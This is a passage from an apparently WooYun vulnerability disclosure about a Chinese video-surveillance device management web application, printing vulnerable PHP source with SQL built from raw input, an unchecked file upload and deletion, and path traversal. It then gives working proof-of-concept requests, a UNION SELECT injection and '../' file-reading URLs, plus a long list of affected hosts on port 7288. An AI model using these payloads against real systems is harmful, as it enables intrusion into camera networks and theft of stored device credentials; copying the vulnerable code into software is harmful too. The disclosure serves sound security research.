$query = $dbQuery->execute('update user_info set name="'.$name.'",password="'.$password.'",unitCode="'.$unitCode.'",realName="'.$realName.'",phone="'.$phone.'",eMail="'.$eMail.'",roleId='.$roleId.',updataTime="'.$time.'" where userId='.$userId);
}
else{
$query = $dbQuery->execute('update user_info set name="'.$name.'",unitCode="'.$unitCode.'",realName="'.$realName.'",phone="'.$phone.'",eMail="'.$eMail.'",roleId='.$roleId.',updataTime="'.$time.'" where userId='.$userId);
}
if ($query) {
echo $userId;
}else{
echo 0;
}
$dbQuery->closeDb();
}
?>


第二十五处:/data/fetchCameraInfo.php

<?php	
include('../common/connDb.php');
include('../common/unitCode.php');
$dbQuery = new DataBaseQuery();
$page=$_POST['page'];
$rows=$_POST['rows'];
$sort=$_POST['sort'];
$order=$_POST['order'];
$start=($page -1)*$rows;
[email protected]$_POST['name'];
[email protected]$_POST['organize'];
[email protected]$_POST['group'];
[email protected]$_POST['configFlag'];
$whereStr="";
if($name != ""){
if($name=="." || $name=="%" || $name=="_"){
$name ="[".$name."]";
}
$whereStr =" and (d.name like '%".$name."%' or **.**.**.**work_addr like '%".$name."%' or c.name like '%".$name."%')";
}
if($organize != ""){
if($organize =="0"){ //如果是主控制中心则查询全部
}else{
if(strlen($organize)==8){//如果是派出所级别
$whereStr =" and d.indexcode like '".$organize."%' and d.ctrl_unit_id<>1";
}else{
$qxCode = substr($organize,4,2);
$shiCode = substr($organize,2,2);
$shengCode = substr($organize,0,2);
if($shiCode=="00" && $qxCode=="00"){ //如果是省
$whereStr =" and d.indexcode like '".$shengCode."%' and d.ctrl_unit_id<>1";
}else if($shiCode !="00" && $qxCode=="00"){ //如果是市
$whereStr =" and d.indexcode like '".$shengCode.$shiCode."%' and d.ctrl_unit_id<>1";
}else{
$whereStr =" and d.indexcode like '".$organize."%' and d.ctrl_unit_id<>1";
}
}

}
}
if($group != ""){
if($group=="-1"){
}else{
$whereStr =" and d.group_id =".$group;
}
}
if($configFlag == "1"){
$whereStr =" and (c.is_transform is null or c.is_transform=0)";
}else if($configFlag == "2"){
$whereStr =" and (c.is_stream_transmit is null or c.is_stream_transmit=0)";
}
$re = $dbQuery->query('select c.id,c.name,c.indexcode,d.name deviceName,**.**.**.**work_addr networkAddr,**.**.**.**work_port networkPort,c.is_transform transform,c.is_stream_transmit streamTransmit,d.status,d.id deviceId,c.local_num num,d.reg_type regType,d.indexcode devIndexCode,d.type_code typeCode,d.username,d.password,d.id deviceId from camera_info c,device_info d where c.device_indexcode=d.indexcode'.$unitWhere.$whereStr.' order by d.id '.$order.' limit '.$start.','.$rows);
$count = $dbQuery->querySingle('select count(*) from camera_info c,device_info d where c.device_indexcode=d.indexcode'.$unitWhere.$whereStr);
$jsonStr ="";
while ($row = $dbQuery->fetchArray($re)){
$jsonStr = $jsonStr.json_encode($row).",";
}
if($jsonStr !=""){
$jsonStr = substr($jsonStr,0,strlen($jsonStr)-1);
}
$str ='{"total":'.$count.',"rows":['.$jsonStr.']}';
$dbQuery->closeDb();
echo ($str);
?>


第二十六处:/data/fetchDeviceType.php

<?php	
/*
根据typeCode找出设备类型
*/
include('../common/connDb.php');
$dbQuery = new DataBaseQuery();
$typeCode=$_POST['typeCode'];
$typeCodeArray = $dbQuery->querySingleRow('select type_code typeCode,name,manufacturer,register_type registerType,access_type accessType,equipment_type equipmentType,plugin_id pluginId,int_rev port,str_rev cName from device_type_info where type_code='.$typeCode,true);
$dbQuery->closeDb();
echo(json_encode($typeCodeArray));
?>


第二十七处:/data/saveGroup.php

<?php
include('../common/connDb.php');
$operate=$_POST['operate'];
$groupIds = @$_POST['groupIds'];
$groupId= @$_POST['groupId'];
$name= @$_POST['name'];
if($operate=="delete"){ //如果是删除操作
deleteGroup($groupIds);
}else if($operate=="add"){ //如果是增加操作
saveGroup($name);
}else{ //如果是修改操作
updateGroup($groupId,$name);
}
function deleteGroup($groupIds){
$dbQuery = new DataBaseQuery();
$query1 = $dbQuery->execute("update device_info set group_id=0 where group_id in(".$groupIds.")");
$query2 = $dbQuery->execute("delete from device_group_info where id in(".$groupIds.")");
if ($query1 && $query2) {
echo "0";
}else{
echo "1";
}
$dbQuery->closeDb();
}
function saveGroup($name){
$dbQuery = new DataBaseQuery();
date_default_timezone_set('PRC');
$time = date('Y-m-d H:i:s',time());
$query = $dbQuery->execute('insert into device_group_info values(NULL,"'.$name.'","'.$time.'",0,"")');
if ($query) {
echo $dbQuery->lastInsertRowID();
}else{
echo 0;
}
$dbQuery->closeDb();

}
function updateGroup($groupId,$name){
$dbQuery = new DataBaseQuery();
date_default_timezone_set('PRC');
$time = date('Y-m-d H:i:s',time());
$query = $dbQuery->execute('update device_group_info set name="'.$name.'",update_time="'.$time.'" where id='.$groupId);
if ($query) {
echo $groupId;
}else{
echo 0;
}
$dbQuery->closeDb();
}
?>


第二十八处:/data/saveRoleInfo.php

<?php
include('../common/connDb.php');
$operate=$_POST['operate'];
if($operate=="delete"){ //如果是删除操作
$roleIds = $_POST['roleIds'];
deleteRoleInfo($roleIds);
}else{ //如果是增加或者修改操作
$isEmpty=empty($_POST['roleId']);
$name=$_POST['name'];
$description = $_POST['description'];
$menuIds = $_POST['menuIds'];
if($isEmpty){
saveRoleInfo($name,$description,$menuIds);
}else{
updateRoleInfo($_POST['roleId'],$name,$description,$menuIds);
}

}
function deleteRoleInfo($roleIds){
$dbQuery = new DataBaseQuery();
$query1 = $dbQuery->execute("delete from user_info where roleId in(".$roleIds.")");//先删除关联该角色的用户
$query2 = $dbQuery->execute("delete from role_info where roleId in(".$roleIds.")");//再删除角色
if ($query1 && $query2) {
echo "0";
}else{
echo "1";
}
$dbQuery->closeDb();
}
function saveRoleInfo($name,$description,$menuIds){
$dbQuery = new DataBaseQuery();
date_default_timezone_set('PRC');
$time = date('Y-m-d H:i:s',time());
$query = $dbQuery->execute('insert into role_info values (NULL,"'.$name.'","'.$description.'","'.$menuIds.'","'.$time.'","")');
if ($query) {
echo $dbQuery->lastInsertRowID();
}else{
echo 0;
}
$dbQuery->closeDb();

}
function updateRoleInfo($roleId,$name,$description,$menuIds){
$dbQuery = new DataBaseQuery();
date_default_timezone_set('PRC');
$time = date('Y-m-d H:i:s',time());
$query = $dbQuery->execute('update role_info set name="'.$name.'",description="'.$description.'",menuIds="'.$menuIds.'",updataTime="'.$time.'" where roleId='.$roleId);
if ($query) {
echo $roleId;
}else{
echo 0;
}
$dbQuery->closeDb();
}
?>


第二十九处:/data/roleInfoData.php

<?php	
include('../common/connDb.php');
$dbQuery = new DataBaseQuery();
$page=$_POST['page'];
$rows=$_POST['rows'];
$start=($page -1)*$rows;
$re = $dbQuery->query('select * from role_info limit '.$start.','.$rows);
$count = $dbQuery->querySingle('select count(*) from role_info');
$jsonStr ="";
while ($row = $dbQuery->fetchArray($re)){
$jsonStr = $jsonStr.json_encode($row).",";
}
if($jsonStr !=""){
$jsonStr = substr($jsonStr,0,strlen($jsonStr)-1);
}
$str ='{"total":'.$count.',"rows":['.$jsonStr.']}';
$dbQuery->closeDb();
echo ($str);
?>


第三十处:/data/shareDeviceInfo.php

<?php
include('../common/connDb.php');
$operate = $_POST['operate'];
$deviceIds = @$_POST['deviceIds'];
$unitId = @$_POST['unitId'];
$groupId = @$_POST['groupId'];
$dbQuery = new DataBaseQuery();
if($operate=="share"){ //如果是指定勾选共享
shareDeviceInfo($dbQuery,$deviceIds,$unitId);
}else{ //如果是全部共享
shareAllDeviceInfo($dbQuery,$groupId,$unitId);
}
$dbQuery->closeDb();
function shareDeviceInfo($dbQuery,$deviceIds,$unitId){
$query = $dbQuery->execute('update device_info set ctrl_unit_id='.$unitId.' where id in('.$deviceIds.')');
if ($query) {
echo 0;
}else{
echo 1;
}
}
function shareAllDeviceInfo($dbQuery,$groupId,$unitId){
$query = $dbQuery->execute('update device_info set ctrl_unit_id='.$unitId.' where group_id ='.$groupId);
if ($query) {
echo 0;
}else{
echo 1;
}
}
?>


第三十一处:/data/modifyCameraName.php

<?php
include('../common/connDb.php');
$deviceId=$_POST['deviceId'];
$channelNum=$_POST['channelNum'];
$cameraName=$_POST['cameraName'];
$dbQuery = new DataBaseQuery();
$dbQuery->execute('update camera_info set name="'.$cameraName.'" where device_id='.$deviceId.' and local_num ='.$channelNum);
$dbQuery->closeDb();
echo "0";
?>


第三十二处:/data/saveDeviceInfo.php

<?php
include('../common/connDb.php');
$obj=$_POST['obj'];
$analog_chan_count = $_POST['analog_chan_count'];
$digital_chan_count = $_POST['digital_chan_count'];
$alarm_in_count = $_POST['alarm_in_count'];
$alarm_out_count = $_POST['alarm_out_count'];
$audio_num = $_POST['audio_num'];
$dbQuery = new DataBaseQuery();
$xml = simplexml_load_file('../../../pagconf.xml');
$pagIndexCode = $xml->pag->indexCode;
if($obj=="singleIp"){ //如果是单IP添加
$singleIp_addr = $_POST['singleIp_addr'];
$singleIp_port = $_POST['singleIp_port'];
$singleIp_username = $_POST['singleIp_username'];
$singleIp_password = $_POST['singleIp_password'];
$singleIp_typecode = $_POST['singleIp_typecode'];
$singleIp_groupId = $_POST['singleIp_groupId'];
$singleIp_controlUnit = $_POST['singleIp_controlUnit'];
$singleIp_indexcode = getIndexCode($dbQuery,$singleIp_controlUnit);
$name = $_POST['name'];
if($name==""){
$name = $singleIp_addr;
}
$serialnum = $_POST['serialnum'];
$singleIp_allowShare = $_POST['singleIp_allowShare'];
$reg_type = 0; //注册类型-0 被动
$deviceId = saveDeviceInfo($dbQuery,$singleIp_addr,$singleIp_port,$singleIp_username,$singleIp_password,$singleIp_typecode,$singleIp_indexcode,$name,$serialnum,$analog_chan_count,$digital_chan_count,$alarm_in_count,$alarm_out_count,$audio_num,$reg_type,$pagIndexCode,$singleIp_groupId,$singleIp_allowShare,$singleIp_controlUnit);
echo $singleIp_indexcode;
}else if($obj=="ipDomain"){ //如果是IP段添加
$ipDomain_startIp = $_POST['ipDomain_startIp'];
$ipDomain_endIp = $_POST['ipDomain_endIp'];
$ipDomain_typecode = $_POST['ipDomain_typecode'];
$ipDomain_port = $_POST['ipDomain_port'];
$ipDomain_username = $_POST['ipDomain_username'];
$ipDomain_password = $_POST['ipDomain_password'];
$ipDomain_groupId = $_POST['ipDomain_groupId'];
$ipDomain_controlUnit = $_POST['ipDomain_controlUnit'];
$ipDomain_allowShare = $_POST['ipDomain_allowShare'];
$reg_type = 0; //注册类型-0 被动
$deviceIndexCodes ="";
$ipArray = ipMiddle($ipDomain_startIp,$ipDomain_endIp);
for($i=0;$i<count($ipArray);$i++){
$newIndexCode = getIndexCode($dbQuery,$ipDomain_controlUnit);
$deviceId = saveDeviceInfo($dbQuery,$ipArray[$i],$ipDomain_port,$ipDomain_username,$ipDomain_password,$ipDomain_typecode,$newIndexCode,$ipArray[$i],"",$analog_chan_count,$digital_chan_count,$alarm_in_count,$alarm_out_count,$audio_num,$reg_type,$pagIndexCode,$ipDomain_groupId,$ipDomain_allowShare,$ipDomain_controlUnit);
if($i==0){
$deviceIndexCodes = $newIndexCode;
}else{
$deviceIndexCodes = $deviceIndexCodes.",".$newIndexCode;
}
}
echo $deviceIndexCodes;
}else if($obj=="singleCode"){ //如果是单编号添加
$singleCode_typecode = $_POST['singleCode_typecode'];
$singleCode_indexcode = $_POST['singleCode_indexcode'];
$singleCode_groupId = $_POST['singleCode_groupId'];
$singleCode_controlUnit = $_POST['singleCode_controlUnit'];
$name = $_POST['name'];
if($name==""){
$name = "DEVICE_".$singleCode_indexcode;
}
$serialnum = $_POST['serialnum'];
$singleCode_allowShare = $_POST['singleCode_allowShare'];
$reg_type = 4; //注册类型-0 主动
$deviceId = saveDeviceInfo($dbQuery,"**.**.**.**",8000,"admin","12345",$singleCode_typecode,$singleCode_indexcode,$name,$serialnum,$analog_chan_count,$digital_chan_count,$alarm_in_count,$alarm_out_count,$audio_num,$reg_type,$pagIndexCode,$singleCode_groupId,$singleCode_allowShare,$singleCode_controlUnit);
echo $singleCode_indexcode;
}else{ //如果是编号段添加
$codeDomain_typecode = $_POST['codeDomain_typecode'];
$codeDomain_preIndexCode = $_POST['codeDomain_preIndexCode'];
$codeDomain_startCode = $_POST['codeDomain_startCode'];
$codeDomain_endCode = $_POST['codeDomain_endCode'];
$codeDomain_groupId = $_POST['codeDomain_groupId'];
$codeDomain_allowShare = $_POST['codeDomain_allowShare'];
$codeDomain_controlUnit = $_POST['codeDomain_controlUnit'];

$reg_type = 4; //注册类型-0 主动
$deviceIndexCodes ="";
$codeDomain_CodeLength = strlen($codeDomain_endCode);
$indexCodeArray = generateSegmentIndexCode($codeDomain_preIndexCode,intval($codeDomain_startCode),intval($codeDomain_endCode), $codeDomain_CodeLength);
for($i=0;$i<count($indexCodeArray);$i++){
$name = "DEVICE_".$indexCodeArray[$i];
$deviceId = saveDeviceInfo($dbQuery,"**.**.**.**",8000,"admin","12345",$codeDomain_typecode,$indexCodeArray[$i],$name,"",$analog_chan_count,$digital_chan_count,$alarm_in_count,$alarm_out_count,$audio_num,$reg_type,$pagIndexCode,$codeDomain_groupId,$codeDomain_allowShare,$codeDomain_controlUnit);
if($i==0){
$deviceIndexCodes = $indexCodeArray[$i];
}else{
$deviceIndexCodes = $deviceIndexCodes.",".$indexCodeArray[$i];
}
}
echo $deviceIndexCodes;
}
$dbQuery->closeDb();
function saveDeviceInfo($dbQuery,$addr,$port,$username,$password,$typecode,$indexcode,$name,$serialnum,$analog_chan_count,$digital_chan_count,$alarm_in_count,$alarm_out_count,$audio_num,$reg_type,$pagIndexCode,$groupId,$allowShare,$singleIp_controlUnit){
$seq = $dbQuery->querySingle('select seq from sqlite_sequence where name="device_info"');
$str="";
if($seq==null || $seq==""){
$str = "1";
}else{
$str = strval($seq+1);
}
while(strlen($str)<12){
$str="0".$str;
}
$dev_guid=$pagIndexCode.$str;
date_default_timezone_set('PRC');
$time = date('Y-m-d H:i:s',time());
$ctrl_unit_id = "";
if($singleIp_controlUnit=="0"){
$ctrl_unit_id = "1";
}else{
$ctrl_unit_id = "0";
}
$query = $dbQuery->execute('insert into device_info(id,dev_guid,indexcode,name,type_code,reg_type,network_addr,network_port,username,password,group_id,serial_num,alarm_in_count,alarm_out_count,analog_chan_count,digital_chan_count,audio_num,update_time,allow_share,ctrl_unit_id) values (NULL,"'.$dev_guid.'","'.$indexcode.'","'.$name.'",'.$typecode.','.$reg_type.',"'.$addr.'",'.$port.',"'.$username.'","'.$password.'",'.$groupId.',"'.$serialnum.'",'.$alarm_in_count.','.$alarm_out_count.','.$analog_chan_count.','.$digital_chan_count.','.$audio_num.',"'.$time.'",'.$allowShare.','.$ctrl_unit_id.')');
if ($query) {
return $dbQuery->lastInsertRowID();
}else{
return "";
}
}
function ipMiddle($ipDomain_startIp,$ipDomain_endIp){
$ipDomain_startIp = trim($ipDomain_startIp);
$ipDomain_endIp = trim($ipDomain_endIp);
$startIpArray = explode(".",$ipDomain_startIp);
$endIpArray = explode(".",$ipDomain_endIp);
$start0 = intval(trim($startIpArray[0]));
$start1 = intval(trim($startIpArray[1]));
$start2 = intval(trim($startIpArray[2]));
$start3 = intval(trim($startIpArray[3]));
$end0 = intval(trim($endIpArray[0]));
$end1 = intval(trim($endIpArray[1]));
$end2 = intval(trim($endIpArray[2]));
$end3 = intval(trim($endIpArray[3]));
$result = array();
// 如果起始IP地址和结束IP地址不等
while(!($start0 == $end0 && $start1 == $end1 && $start2 == $end2 && $start3 == $end3)){
$candidate = $start0.".".$start1.".".$start2.".".$start3;
// 把起始地址放入数组中
array_push($result,$candidate);
// 起始地址加1
$start3 = $start3 + 1;
if($start3 == 256){
$start3 = 0;
$start2 = $start2 + 1;
if($start2 == 256){
$start2 = 0;
$start1 = $start1 + 1;
if($start1 == 256){
$start1 = 0;
$start0 = $start0 + 1;
}
}
}
}
// 如果退出循环,起始IP地址和结束IP地址相等
array_push($result,$ipDomain_endIp);
return $result;
}
function getIndexCode($dbQuery,$controlUnit){
$preIndex="";
$xml = simplexml_load_file('../common/codeConfig.xml');
$areaCode = strval($xml->areaCode);
$netMark = strval($xml->netMark);
$version = simplexml_load_file('../../../version.xml');
$platformCode = strval($version->Code);
$codeProtocol = strval($version->CodeProtocol); //DB33 GB28181
if($controlUnit=="0"){
date_default_timezone_set('PRC');
$controlUnit = date('ymd',time());
}
if($codeProtocol == 'DB33'){//18bit
if(strlen($controlUnit)==8){
$preIndex = $controlUnit."00".$platformCode;
}else{
$preIndex = $controlUnit."0000".$platformCode;
}
$indexCode="";
$existCount = 0;
do{
$indexCode = $preIndex.getrndnum(4)."00";
$existCount = $dbQuery->querySingle('select count(*) from device_info where indexcode="'.$indexCode.'"');
}while($existCount>0);
return $indexCode;
}else{
if(strlen($controlUnit)==8){
$preIndex = $controlUnit."00".$areaCode.$netMark.$platformCode;
}else{
$preIndex = $controlUnit."0000".$areaCode.$netMark.$platformCode;
}
$indexCode="";
$existCount = 0;
do{
$indexCode = $preIndex.getrndnum(4);
$existCount = $dbQuery->querySingle('select count(*) from device_info where indexcode="'.$indexCode.'"');
}while($existCount>0);
return $indexCode;
}

}
function getrndnum($length=6) {
$hash = '';
$chars = '0123456789';
$max = strlen($chars) - 1;
mt_srand((double)microtime() * 1000000);
for($i = 0; $i < $length; $i++){
$hash .= $chars[mt_rand(0, $max)];
}
return $hash;
}
function generateSegmentIndexCode($preIndexCode,$startIndexCode,$endIndexCode,$codeDomain_CodeLength){
$indexCodeArray = array();
if ($startIndexCode <= $endIndexCode) {
$version = simplexml_load_file('../../../version.xml');
$codeProtocol = strval($version->CodeProtocol); //DB33 GB28181
$length = $codeDomain_CodeLength;//strlen(strval($endIndexCode));
for($i = $startIndexCode;$i<= $endIndexCode;$i++){
$code = strval($i);
$code = str_repeat("0", $length-strlen($code)).$code;
/*if($codeProtocol == 'DB33'){
if(strlen($code)<6){
$code = str_repeat("0", 6-strlen($code)).$code;
}
}else{
if(strlen($code)<4){
$code = str_repeat("0", 4-strlen($code)).$code;
}
}*/
$code = $preIndexCode.$code;
array_push($indexCodeArray,$code);
}
}
return $indexCodeArray;
}

漏洞证明:

第三十三处:/data/deviceAndCameraListData.php

include('../common/connDb.php');
include('../common/unitCode.php');
$dbQuery = new DataBaseQuery();
$page=$_POST['page'];
$rows=$_POST['rows'];
$sort=$_POST['sort'];
$order=$_POST['order'];
$start=($page -1)*$rows;
[email protected]$_POST['name'];
[email protected]$_POST['organize'];
[email protected]$_POST['group'];
[email protected]$_POST['configFlag'];
[email protected]$_GET['type'];
$deviceIndexCode = @$_GET['deviceIndexCode'];
$deviceId = @$_GET['deviceId'];
$show = @$_GET['show'];
if($type =="device"){
$whereStr="";
if($name != ""){
if($name=="." || $name=="%" || $name=="_"){
$name ="[".$name."]";
}
$whereStr =" and (d.name like '%".$name."%' or **.**.**.**work_addr like '%".$name."%')";
}
if($organize != ""){
if($organize =="0"){ //如果是主控制中心则查询全部
}else{
if(strlen($organize)==8){//如果是派出所级别
$whereStr =" and d.indexcode like '".$organize."%'";
}else{
$qxCode = substr($organize,4,2);
$shiCode = substr($organize,2,2);
$shengCode = substr($organize,0,2);
if($shiCode=="00" && $qxCode=="00"){ //如果是省
$whereStr =" and d.indexcode like '".$shengCode."%'";
}else if($shiCode !="00" && $qxCode=="00"){ //如果是市
$whereStr =" and d.indexcode like '".$shengCode.$shiCode."%'";
}else{
$whereStr =" and d.indexcode like '".$organize."%'";
}
}

}
}
if($group != ""){
if($group=="-1"){
}else{
$whereStr =" and d.group_id =".$group;
}
}
$str="";
if($configFlag == "1"){
$str =" and (c.is_transform is null or c.is_transform=0)";
}else if($configFlag == "2"){
$str =" and (c.is_stream_transmit is null or c.is_stream_transmit=0)";
}
$re = $dbQuery->query('select distinct d.id,d.name,d.type_code,(select name from device_type_info where type_code = d.type_code) deviceType,d.reg_type regType,**.**.**.**work_addr networkAddr,**.**.**.**work_port networkPort,d.status,"device" type,d.indexcode,d.username,d.password from device_info d,camera_info c where d.indexcode=c.device_indexcode'.$unitWhere.$whereStr.$str.' order by d.'.$sort.' '.$order.' limit '.$start.','.$rows);
$jsonArray = array();


$count = $dbQuery->querySingle('select count(distinct d.id) from device_info d,camera_info c where d.indexcode=c.device_indexcode'.$unitWhere.$whereStr.$str);
while ($row = $dbQuery->fetchArray($re)){
$pNode = new TreeNode();
$pNode->setId('device_'.$row['id']);
$pNode->setName($row['name']);
$pNode->setTypeCode($row['type_code']);
$pNode->setDeviceType($row['deviceType']);
$pNode->setRegType($row['regType']);
$pNode->setNetworkAddr($row['networkAddr']);
$pNode->setNetworkPort($row['networkPort']);
$pNode->setStatus($row['status']);
$pNode->setType($row['type']);
$pNode->setNum(0);
$pNode->setIndexCode($row['indexcode']);
$pNode->setUserName($row['username']);
$pNode->setPassword($row['password']);
$pNode->setIsTransform('/');
$pNode->setIsStreamTransform('/');
$pNode->setParentId("");
$pNode->setState('closed');
$pNode->setChecked(false);
$pNode->setIconCls('icon-deviceManage');
//fetchCameraByDeviceId($dbQuery,$row['indexcode'],$pNode,$row['id'],$configFlag);
array_push($jsonArray,$pNode);
}

$str ='{"total":'.$count.',"rows":'.json_encode($jsonArray).'}';
$dbQuery->closeDb();
echo $str;
}else{
fetchCameraByDeviceId($dbQuery,$deviceIndexCode,$deviceId,$show);
}


function fetchCameraByDeviceId($dbQuery,$deviceIndexCode,$deviceId,$show){
$whereStr ="";
if($show == "1"){
$whereStr =" and (a.is_transform is null or a.is_transform=0)";
}else if($show == "2"){
$whereStr =" and (a.is_stream_transmit is null or a.is_stream_transmit=0)";
}
$re = $dbQuery->query('select a.id,a.name,"/" deviceType,"/" regType,"/" networkAddr,"/" networkPort,b.status,"camera" type,a.local_num num,a.indexcode,a.is_transform transform,a.is_stream_transmit streamTransmit from camera_info a,device_info b where a.device_indexcode=b.indexcode and a.device_indexcode="'.$deviceIndexCode.'"'.$whereStr);
$jsonArray = array();
while ($row = $dbQuery->fetchArray($re)){
$cNode = new TreeNode();
$cNode->setId('camera_'.$row['id']);
$cNode->setName($row['name']);
$cNode->setTypeCode(0);
$cNode->setDeviceType($row['deviceType']);
$cNode->setRegType($row['regType']);
$cNode->setNetworkAddr($row['networkAddr']);
$cNode->setNetworkPort($row['networkPort']);
$cNode->setStatus($row['status']);
$cNode->setChecked(false);
$cNode->setType($row['type']);
$cNode->setNum($row['num']);
$cNode->setIndexCode($row['indexcode']);
$cNode->setUserName("");
$cNode->setPassword("");
$cNode->setIsTransform($row['transform']);
$cNode->setIsStreamTransform($row['streamTransmit']);
$cNode->setIconCls('icon-camera');
$cNode->setParentId($deviceId);
array_push($jsonArray,$cNode);
}
$str =json_encode($jsonArray);
$dbQuery->closeDb();
echo $str;
}
?>


第三十四处:/data/groupListData.php

<?php	
include('../common/connDb.php');
$dbQuery = new DataBaseQuery();
$page=$_POST['page'];
$rows=$_POST['rows'];
$start=($page -1)*$rows;
$re = $dbQuery->query('select * from device_group_info limit '.$start.','.$rows);
$count = $dbQuery->querySingle('select count(*) from device_group_info');
$jsonStr ="";
while ($row = $dbQuery->fetchArray($re)){
$jsonStr = $jsonStr.json_encode($row).",";
}
if($jsonStr !=""){
$jsonStr = substr($jsonStr,0,strlen($jsonStr)-1);
}
$str ='{"total":'.$count.',"rows":['.$jsonStr.']}';
$dbQuery->closeDb();
echo ($str);
?>


任意文件生成:/data/deletePlugFiles.php

<?php
include('../common/connDb.php');
$dirName = $_POST['dirName'];
$fileName = $_POST['fileName'];
$filePath = '../../../../plugins/'.$dirName.'/'.$fileName;
if (file_exists($filePath)) {
$result=unlink($filePath);
if($result){
echo 0;
}else{
echo 1;
}
}else{
echo 1;
}
?>


任意文件上传:

<?php
include('../common/connDb.php');
$foldName = $_POST['foldName'];
$foldPath = '../../../../plugins/'.$foldName;
if(!file_exists($foldPath)){
mkdir($foldPath,0777);
}
$plugFiles = $_FILES['plugFile'];
for($i=0;$i<count($plugFiles['name']);$i++){
//如果未出错
if($_FILES['plugFile']['error'][$i]==0){
if(!move_uploaded_file($_FILES['plugFile']['tmp_name'][$i],$foldPath."/".$_FILES['plugFile']['name'][$i])){
echo 1;
return;
}
}
}
echo 0;
?>


任意目录遍历:/remoteUpdate/showFile.php

<?php
$dirName = $_GET['fileName']; //插件文件夹
?>
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://**.**.**.**/TR/html4/loose.dtd">
<html>
<head>
<link rel="stylesheet" type="text/css" href="../easyui/themes/default/easyui.css">
<link rel="stylesheet" type="text/css" href="../easyui/themes/icon.css">
<link rel="stylesheet" type="text/css" href="../easyui/themes/particular_blue.css">

<script type="text/javascript" src="../easyui/jquery-1.4.4.min.js"></script>
<script type="text/javascript" src="../easyui/jquery.easyui.min.js"></script>
<script type="text/javascript" src="../easyui/locale/easyui-lang-zh_CN.js"></script>
<script type="text/javascript" src="../easyui/easyloader.js"></script>
<title>查看插件明细</title>
<script>
$(function(){
$('#tree').tree({
animate:true,
lines:true,
url:'../data/fetchPlugJsonByFolder.php?dirName=<?php echo $dirName;?>',
onContextMenu: function(e, node){
if(node.iconCls !="icon-plugFold"){
e.preventDefault();
$('#tree').tree('select', node.target);
$('#mmt').menu('show', {
left: e.pageX,
top: e.pageY
});
}
}
});
$('#delete').click(function(){
parent.$.messager.confirm('确认框', '您确定要删除?', function(r){
if (r){
var fileName=$('#tree').tree('getSelected').id;
$.ajax({
type: "POST",
url: "../data/deletePlugFiles.php",
data: "dirName=<?php echo $dirName;?>&fileName="+fileName,
success: function(msg){
if(msg=="0"){
$('#tree').tree('reload');
}else{
parent.$.messager.alert('提示','删除失败!','error');
}
}
});

}


任意文件遍历:/serverLog/showFile.php

<?php
$file_name = $_GET['fileName'];
$file_path = '../../../log/'.$file_name;
$fp = fopen($file_path, "r");
while($line = fgets($fp)){
$line = nl2br(htmlentities($line, ENT_COMPAT, "utf-8"));
echo '<span style="font-size:16px">'.$line.'</span>';
}
fclose($fp);
?>


任意文件遍历:
**.**.**.**:7288/serverLog/showFile.php?fileName=../web/html/serverLog/showFile.php

aaaaaaaaaaaaaaaaaaa4444444444444444444444.jpg


随便手工验证一处注入:
**.**.**.**:7288/transformServer/serverConfigInfo.php?transId=1 union select 1,2,3,(select GROUP_CONCAT(1,2) from camera_info),5,6,7,8,9,10,11,12,13,14--

aaaaaaaaaaaaaaaaaaaa333333333333333333333.jpg


目录遍历:
**.**.**.**:7288/remoteUpdate/showFile.php?fileName=../../../

aaaaaaaaaaaaaaaa55555555555555555555.jpg


案例:

**.**.**.**:7288/
**.**.**.**:7288/
**.**.**.**:7288/
http://**.**.**.**:7288/
**.**.**.**:7288/
**.**.**.**:7288/
**.**.**.**:7288/
**.**.**.**:7288/
**.**.**.**:7288/
**.**.**.**:7288/
**.**.**.**:7288/
**.**.**.**:7288/
**.**.**.**:7288/
**.**.**.**:7288/
**.**.**.**:7288/
http://**.**.**.**:7288/
**.**.**.**:7288/
**.**.**.**:7288/
**.**.**.**:7288/
**.**.**.**:7288/
**.**.**.**:7288/
**.**.**.**:7288/
**.**.**.**:7288/
**.**.**.**:7288/
**.**.**.**:7288/
**.**.**.**:7288/
**.**.**.**:7288/
**.**.**.**:7288/
**.**.**.**:7288/
**.**.**.**:7288/
**.**.**.**:7288/
**.**.**.**:7288/
**.**.**.**:7288/
**.**.**.**:7288/
**.**.**.**:7288/
**.**.**.**:7288/
**.**.**.**:7288/
**.**.**.**:7288/
**.**.**.**:7288/
**.**.**.**:7288/
**.**.**.**:7288/
**.**.**.**:7288/
**.**.**.**:7288/
http://**.**.**.**:7288/
**.**.**.**:7288/
**.**.**.**:7288/
**.**.**.**:7288/
**.**.**.**:7288/
**.**.**.**:7288/
**.**.**.**:7288/
**.**.**.**:7288/
**.**.**.**:7288/
**.**.**.**:7288/
**.**.**.**:7288/
**.**.**.**:7288/
**.**.**.**:7288/
**.**.**.**:7288/
**.**.**.**:7288/
**.**.**.**:7288/
**.**.**.**:7288/
**.**.**.**:7288/
**.**.**.**:8090/
**.**.**.**:7288/
**.**.**.**:7288/
**.**.**.**:7288/
**.**.**.**:7288/
**.**.**.**:7288/
**.**.**.**:7288/
**.**.**.**:7288/
**.**.**.**:7288/
**.**.**.**:7288/
**.**.**.**:7288/
**.**.**.**:7288/
**.**.**.**:7288/
**.**.**.**:7288/
**.**.**.**:7288/
**.**.**.**:7288/
**.**.**.**:7288/
**.**.**.**:7288/
**.**.**.**:7288/
**.**.**.**:7288/
**.**.**.**:7288/
**.**.**.**:7288/
**.**.**.**:7288/
**.**.**.**:7288/
**.**.**.**:7288/
**.**.**.**:7288/
**.**.**.**:7288/
**.**.**.**:7288/
**.**.**.**:7288/
**.**.**.**:7288/
**.**.**.**:7288/
**.**.**.**:7288/
**.**.**.**:7288/
**.**.**.**:7288/

修复方案:

你们懂的。

版权声明:转载请注明来源 YY-2012@乌云


漏洞回应

厂商回应:

危害等级:低

漏洞Rank:3

确认时间:2016-03-06 09:58

厂商回复:

您好,该问题属于与WooYun-2016- 重复问题,该产品线目前已停产。我们会通过各种渠道对使用旧版本的客户平台进行加固升级。

最新状态:

暂无